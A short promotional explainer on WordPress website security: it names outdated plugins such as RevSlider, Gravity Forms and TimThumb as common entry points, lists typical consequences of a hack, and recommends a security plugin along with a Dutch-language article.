While WordPress itself receives frequent updates and security improvements from its developers, plugins remain the weak link in the chain. Plugins with cross-site scripting (XSS) and other injection vulnerabilities leave websites open to attack. Popular plugins such as RevSlider, Gravity Forms and TimThumb, powerful as they are, are often not updated promptly by site owners, so old vulnerable versions stay exploitable long after a fix is available.

The most common problems seen in hacked websites are backdoors, malware distribution, SEO spam, unauthorised email sending and defacement. These seriously harm a website's reputation and functionality.

Timely updates alone are not enough to keep attackers out. An effective antivirus plugin for WordPress that closes over 100 known vulnerabilities and intercepts attacker methods is crucial to stop the website from being an easy target.

For further protection and more tips on securing your WordPress website, you can explore the article ‘Serieus, je moet je WordPress website nu echt beveiligen’ (in Dutch).